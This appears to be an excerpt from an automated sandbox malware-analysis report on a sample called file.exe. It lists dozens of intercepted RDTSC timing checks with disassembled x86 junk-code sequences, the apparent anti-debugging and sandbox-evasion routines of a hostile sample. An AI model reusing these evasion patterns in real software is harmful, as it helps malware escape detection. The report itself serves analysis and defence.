Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E6C11 second address: 9E6C8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE08A230Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007FEEE08A2308h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 mov edi, dword ptr [ebp+122D2B40h] 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edx 0x0000002f call 00007FEEE08A2308h 0x00000034 pop edx 0x00000035 mov dword ptr [esp+04h], edx 0x00000039 add dword ptr [esp+04h], 00000014h 0x00000041 inc edx 0x00000042 push edx 0x00000043 ret 0x00000044 pop edx 0x00000045 ret 0x00000046 mov di, 1FE0h 0x0000004a push 00000000h 0x0000004c xchg eax, esi 0x0000004d jmp 00007FEEE08A2311h 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007FEEE08A230Dh 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E5ECD second address: 9E5EEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE360Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007FEEE0EE360Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E5EEB second address: 9E5EEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E5EEF second address: 9E5EF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E6ED1 second address: 9E6EE8 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FEEE08A230Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pushad 0x0000000f popad 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E7DCC second address: 9E7DD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E7F10 second address: 9E7F19 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E8F0C second address: 9E8F16 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FEEE0EE3606h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E8F16 second address: 9E8F20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FEEE08A2306h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EAE9C second address: 9EAEA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EA134 second address: 9EA154 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a jmp 00007FEEE08A2315h 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EA206 second address: 9EA20D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EBDB6 second address: 9EBDF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEEE08A230Dh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e movsx edi, si 0x00000011 push 00000000h 0x00000013 or ebx, dword ptr [ebp+122D301Bh] 0x00000019 push 00000000h 0x0000001b pushad 0x0000001c or ch, 00000001h 0x0000001f mov dword ptr [ebp+122D232Ch], esi 0x00000025 popad 0x00000026 mov dword ptr [ebp+122D305Ah], edi 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f push edx 0x00000030 push ebx 0x00000031 pop ebx 0x00000032 pop edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EDE1A second address: 9EDE33 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnp 00007FEEE0EE3606h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jno 00007FEEE0EE3608h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EDE33 second address: 9EDE39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ECF46 second address: 9ECF5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 push eax 0x00000007 jo 00007FEEE0EE3614h 0x0000000d push eax 0x0000000e push edx 0x0000000f jo 00007FEEE0EE3606h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EFE45 second address: 9EFE93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FEEE08A2306h 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007FEEE08A2308h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 mov dword ptr [ebp+122D3621h], esi 0x0000002e push 00000000h 0x00000030 mov bl, 21h 0x00000032 push 00000000h 0x00000034 xor dword ptr [ebp+122D1928h], edx 0x0000003a mov edi, dword ptr [ebp+122D2B30h] 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 push esi 0x00000045 pop esi 0x00000046 push ecx 0x00000047 pop ecx 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F0EE1 second address: 9F0EE7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F0EE7 second address: 9F0F0E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jng 00007FEEE08A2306h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FEEE08A2317h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F1D74 second address: 9F1D78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F10A1 second address: 9F10A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EEFD1 second address: 9EEFD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F1EB2 second address: 9F1EB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F10A7 second address: 9F10AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EEFD5 second address: 9EEFDF instructions: 0x00000000 rdtsc 0x00000002 jo 00007FEEE08A2306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F1EB8 second address: 9F1EC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FEEE0EE3606h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EDFF5 second address: 9EDFF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F10AB second address: 9F10D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE360Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007FEEE0EE360Eh 0x00000012 pushad 0x00000013 jns 00007FEEE0EE3606h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EEFDF second address: 9EEFE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FEEE08A2306h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F4E53 second address: 9F4E57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EDFF9 second address: 9EDFFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EEFE9 second address: 9EEFF6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EDFFF second address: 9EE009 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FEEE08A2306h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F1F6F second address: 9F1F74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F3FA8 second address: 9F3FCE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jns 00007FEEE08A2306h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FEEE08A2317h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F5015 second address: 9F5019 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F906D second address: 9F9077 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FEEE08A2306h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F9077 second address: 9F907B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FEA95 second address: 9FEA9D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 992B77 second address: 992B7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 992B7B second address: 992B83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 992B83 second address: 992B9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FEEE0EE3611h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FE27E second address: 9FE295 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jnc 00007FEEE08A2306h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d jo 00007FEEE08A2318h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FE295 second address: 9FE299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FE299 second address: 9FE29D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FE3E1 second address: 9FE3F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEEE0EE360Ah 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FE3F0 second address: 9FE3F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FE3F6 second address: 9FE3FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FE3FA second address: 9FE3FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A02F3E second address: A02F4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007FEEE0EE3606h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05749 second address: A0574D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05816 second address: A0581F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0581F second address: A05823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A1EFB second address: 9A1F09 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FEEE0EE3606h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A09452 second address: A0948A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FEEE08A2317h 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d jl 00007FEEE08A2306h 0x00000013 popad 0x00000014 popad 0x00000015 pushad 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 js 00007FEEE08A2306h 0x0000001f push eax 0x00000020 pop eax 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0948A second address: A09494 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FEEE0EE3606h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A09E8A second address: A09E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0A046 second address: A0A052 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007FEEE0EE3606h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0D60C second address: A0D655 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FEEE08A2311h 0x00000008 jmp 00007FEEE08A2319h 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FEEE08A2319h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0D655 second address: A0D688 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FEEE0EE3606h 0x00000008 jmp 00007FEEE0EE3618h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jng 00007FEEE0EE3614h 0x00000017 push esi 0x00000018 jnc 00007FEEE0EE3606h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A11C39 second address: A11C45 instructions: 0x00000000 rdtsc 0x00000002 js 00007FEEE08A230Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A11C45 second address: A11C57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FEEE0EE3608h 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A11C57 second address: A11C79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEEE08A2311h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jo 00007FEEE08A230Eh 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D988A second address: 9D9893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D9893 second address: 9D990A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 js 00007FEEE08A230Ch 0x0000000e push edx 0x0000000f jmp 00007FEEE08A230Dh 0x00000014 pop edx 0x00000015 popad 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push edi 0x0000001a call 00007FEEE08A2308h 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], edi 0x00000024 add dword ptr [esp+04h], 0000001Ch 0x0000002c inc edi 0x0000002d push edi 0x0000002e ret 0x0000002f pop edi 0x00000030 ret 0x00000031 lea eax, dword ptr [ebp+124875CAh] 0x00000037 add di, F456h 0x0000003c nop 0x0000003d pushad 0x0000003e pushad 0x0000003f push ecx 0x00000040 pop ecx 0x00000041 push esi 0x00000042 pop esi 0x00000043 popad 0x00000044 pushad 0x00000045 jmp 00007FEEE08A2318h 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D9A18 second address: 9D9A1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D9B38 second address: 9D9B41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D9EFE second address: 9D9F04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D9F04 second address: 9D9F08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA1A5 second address: 9DA1AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA7C7 second address: 9DA7CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA7CC second address: 9DA80E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE360Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c adc ch, 00000046h 0x0000000f push 0000001Eh 0x00000011 call 00007FEEE0EE3618h 0x00000016 sub dl, FFFFFFECh 0x00000019 pop ecx 0x0000001a nop 0x0000001b push esi 0x0000001c pushad 0x0000001d jne 00007FEEE0EE3606h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA94B second address: 9DA951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA951 second address: 9DA956 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DAC79 second address: 9C1FF1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FEEE08A2310h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jne 00007FEEE08A2316h 0x00000012 nop 0x00000013 mov di, cx 0x00000016 call dword ptr [ebp+122D1A00h] 0x0000001c push ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f jp 00007FEEE08A2306h 0x00000025 jmp 00007FEEE08A230Eh 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C1FF1 second address: 9C1FF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A11ECA second address: A11ED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FEEE08A2306h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1205A second address: A1205E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A128C5 second address: A128CF instructions: 0x00000000 rdtsc 0x00000002 jng 00007FEEE08A2306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A128CF second address: A128D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A128D5 second address: A128ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE08A2314h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A128ED second address: A12908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007FEEE0EE3618h 0x0000000e push edx 0x0000000f jnl 00007FEEE0EE3606h 0x00000015 pop edx 0x00000016 pushad 0x00000017 push edx 0x00000018 pop edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A16327 second address: A16364 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE08A2310h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 jng 00007FEEE08A2306h 0x0000001a jmp 00007FEEE08A2318h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A16364 second address: A1637D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE3615h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1637D second address: A16383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9996ED second address: 9996F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AEDF second address: A1AEE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AEE5 second address: A1AEE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AEE9 second address: A1AF0A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FEEE08A2318h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1B64B second address: A1B671 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FEEE0EE3616h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007FEEE0EE3606h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1B671 second address: A1B68D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE08A2318h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
